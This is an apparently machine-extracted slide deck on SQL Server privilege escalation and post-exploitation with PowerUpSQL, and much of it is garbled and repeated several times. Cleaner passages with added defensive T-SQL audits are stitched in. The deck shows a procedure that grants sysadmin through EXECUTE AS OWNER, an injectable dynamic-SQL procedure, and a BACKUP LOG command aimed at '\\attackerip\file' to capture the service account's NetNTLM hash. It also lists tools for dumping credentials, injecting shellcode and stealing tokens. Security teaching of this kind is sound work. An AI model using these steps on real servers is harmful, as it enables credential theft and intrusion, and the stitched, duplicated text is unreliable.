Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
[Diagram: "Leveraging MS SQL Database links". Same zones and hosts as the previous diagram (Internet / DMZ / Intranet; LRA, HVA, LVA, ADS; ports 80 and 443 outside, 1433 and 1434 inside; attacker "Captain Evil"). DB1 is an LVA that holds one DB link configured with least privileges and a second DB link configured with the SA account. Steps shown: 1 SQL Injection against DB1; 2 Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of the environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
• Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
• Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/

Function / Description
Get-SQLServerLink: Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
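The links a crawl would follow can be inventoried from the owning side first. The T-SQL below is an added example, not a PowerUpSQL function and not from the slides: it reads the catalog views sys.servers and sys.linked_logins on an instance you administer and flags the configuration the diagram calls a "DB Link with SA account" (a catch-all login mapping to a fixed remote login). The linked-server name SQLSERVER2 in the hardening statements is the placeholder name the slide uses.

```sql
-- Added example (not PowerUpSQL, not from the slides): inventory every linked server on
-- this instance together with the login mapping it uses. Needs VIEW ANY DEFINITION.
SELECT
    s.name                                  AS linked_server,
    s.product,
    s.provider,
    s.data_source,
    s.is_rpc_out_enabled,                   -- 1 = EXEC ... AT link works, so xp_cmdshell can cross the link
    s.is_data_access_enabled,               -- 1 = OPENQUERY and four-part names work
    CASE
        WHEN ll.server_id IS NULL          THEN N'(no mapping)'
        WHEN ll.local_principal_id = 0     THEN N'<all logins without an explicit mapping>'
        ELSE lp.name
    END                                     AS local_login,
    ll.uses_self_credential,                -- 1 = the caller's own credentials are forwarded
    ll.remote_name,                         -- fixed remote login used when uses_self_credential = 0
    CASE
        WHEN ll.server_id IS NULL
            THEN N'link has no login mapping'
        WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
            THEN N'REVIEW: every login on this server reaches the remote side as ' + ll.remote_name
        WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0
            THEN N'default mapping sends no credentials'
        WHEN ll.local_principal_id = 0
            THEN N'default mapping forwards the caller identity'
        ELSE N'explicit mapping for one login'
    END                                     AS assessment
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp
       ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;
GO

-- Hardening for a link the report flagged. SQLSERVER2 is the placeholder name from the slide.
-- 1. Remove the catch-all mapping; logins without an explicit mapping can no longer use the link.
EXEC sys.sp_droplinkedsrvlogin @rmtsrvname = N'SQLSERVER2', @locallogin = NULL;
-- 2. Stop remote procedure calls from crossing the link (OPENQUERY still works where it is needed).
EXEC sys.sp_serveroption @server = N'SQLSERVER2', @optname = N'rpc out', @optvalue = N'false';
GO
```

The rows marked REVIEW are the ones worth fixing first: a default mapping to a fixed remote login means membership in the Public role on the local server is enough to reach the remote server as that login, which is exactly what the crawl relies on. Running the report on every instance and joining the results by data_source also gives the hop graph the stats slide describes, without crawling anything.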
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands:
  BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
  RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016:
  https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008

So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.

But who really has PUBLIC role access?
Oh yeah, a ton of domain users.

Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
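On the versions the slide says have no fix, and as a second line on the patched ones, the defender's option is to see every backup or restore that points at a share. The script below is an added example, not from the slides or PowerUpSQL: it uses SQL Server Audit (available from SQL Server 2008) with the BACKUP_RESTORE_GROUP action group to record every BACKUP and RESTORE statement, then searches the captured statements for a UNC target. The audit and specification names and the D:\Audit\ folder are placeholders.

```sql
-- Added example (not from the slides, not PowerUpSQL): record every BACKUP and RESTORE
-- statement with SQL Server Audit and look for UNC targets in what was captured.
-- Placeholders: the audit and specification names and the D:\Audit\ folder.
USE master;
GO
CREATE SERVER AUDIT Audit_BackupRestore
    TO FILE (FILEPATH = N'D:\Audit\', MAXSIZE = 256 MB, MAX_ROLLOVER_FILES = 10)
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);
GO
CREATE SERVER AUDIT SPECIFICATION Spec_BackupRestore
    FOR SERVER AUDIT Audit_BackupRestore
    ADD (BACKUP_RESTORE_GROUP)               -- raised for BACKUP and RESTORE regardless of who issues them
    WITH (STATE = ON);
GO
ALTER SERVER AUDIT Audit_BackupRestore WITH (STATE = ON);
GO

-- Review: backups or restores aimed at a share (\\host\share) instead of a local device.
-- In T-SQL LIKE a backslash is an ordinary character, so '%\\%' matches a literal "\\".
-- A hit issued by a login that is not a DBA is the pattern the slides describe.
SELECT event_time,
       server_principal_name,
       database_name,
       statement
FROM sys.fn_get_audit_file(N'D:\Audit\Audit_BackupRestore*.sqlaudit', DEFAULT, DEFAULT)
WHERE statement LIKE N'%\\%'
ORDER BY event_time DESC;
GO
```

The audit records, it does not block: the service account still authenticates to whatever share the statement names. What it adds is the issuing login and the exact statement, which is enough to tell a scheduled backup to a known file server from a one-off BACKUP LOG issued by an ordinary domain user, and to pair that event with the outbound SMB connection from the SQL Server host.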
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges

Approach (columns: 2000, 2005, 2008, 2012, 2014, 2016)
LSA Secrets: x x x x x x
Local Administrator: x x
LocalSystem: x x x
Process Migration: x x x x x x
Token Stealing: x x x x x x
Single User Mode: x x x x x
Below are some options for leveraging that knowledge.

Here are some tool options (Approach: Common Tools)
• Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
• Access as LocalSystem: Psexec, accessibility options, debugger with native SQL client tools
• Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
• Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal authentication token from the SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
• Single User Mode: DBATools
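Before deciding which rows of the table apply to a given instance, its owner needs three facts from it: which account the engine runs as, who is already sysadmin, and whether xp_cmdshell is on. The queries below are an added example (not PowerUpSQL functions, not from the slides); they need VIEW SERVER STATE and VIEW ANY DEFINITION, and sys.dm_server_services exists from SQL Server 2008 R2 SP1 onward.

```sql
-- Added example (not PowerUpSQL, not from the slides): the three facts an instance owner
-- needs before applying the version table above. Needs VIEW SERVER STATE and VIEW ANY DEFINITION.

-- 1. Which Windows account the engine runs as. That account is sysadmin on every version
--    in the table; if it also runs other instances, the shared-service-account slide applies.
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;            -- SQL Server 2008 R2 SP1 and later

-- 2. Current sysadmin members. BUILTIN\Administrators (a default member on 2000/2005) or
--    NT AUTHORITY\SYSTEM (a default member through 2008) still listed here gives the role
--    to every local administrator or LocalSystem process on the host.
SELECT m.name AS member_login, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY m.name;

-- 3. Whether xp_cmdshell is switched on; value_in_use = 1 means OS commands already run
--    as the service account from step 1.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';
GO
```

Removing BUILTIN\Administrators and NT AUTHORITY\SYSTEM from sysadmin closes the two "free" rows of the table (Local Administrator and LocalSystem); the remaining rows depend on the service account itself, which is why the recommendation is a dedicated low-privilege service account per instance rather than one domain account shared across many.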
Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto-runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
Escalating Privileges: Impersonation
SQL Injection Example

    CREATE PROCEDURE sp_sqli2
        @DbName varchar(max)
    AS
    BEGIN
        Declare @query as varchar(max)
        -- @DbName is concatenated straight into the query text: this is the injection point
        SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
        EXECUTE(@query)
    END
    GO
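The same lookup written so that the argument cannot alter the statement, as an added example that is not from the slides; the procedure name sp_sqli2_safe is illustrative. The difference is that @DbName reaches sp_executesql as a bound parameter, so the engine never treats its contents as SQL text, whatever execution context (owner or caller) the procedure is given.

```sql
-- Added example (not from the slides): the lookup performed by sp_sqli2, rebuilt so the
-- caller-supplied @DbName can never become part of the SQL text. sp_sqli2_safe is an
-- illustrative name.
CREATE PROCEDURE sp_sqli2_safe
    @DbName sysname                  -- database names fit in sysname; no need for varchar(max)
AS
BEGIN
    SET NOCOUNT ON;

    -- The statement is fixed text; the only variable part is a parameter marker.
    DECLARE @sql nvarchar(max) =
        N'SELECT name FROM sys.databases WHERE name LIKE @pattern OR name = N''tempdb'';';

    -- Build the LIKE pattern as a value. Quotes, comment markers or semicolons in
    -- @DbName stay inside the value and are matched literally.
    DECLARE @pattern nvarchar(130) = N'%' + @DbName + N'%';

    EXEC sys.sp_executesql
        @sql,
        N'@pattern nvarchar(130)',
        @pattern = @pattern;
END
GO

-- Ordinary use behaves like the original: returns master and tempdb.
EXEC sp_sqli2_safe @DbName = N'mast';
GO
```

If the procedure is also given WITH EXECUTE AS OWNER for impersonation, the parameter binding is what keeps that elevated context from being handed to the caller; the wildcard characters % and _ in the argument still widen the match, which is harmless here but worth escaping where the result feeds an authorization decision.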
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
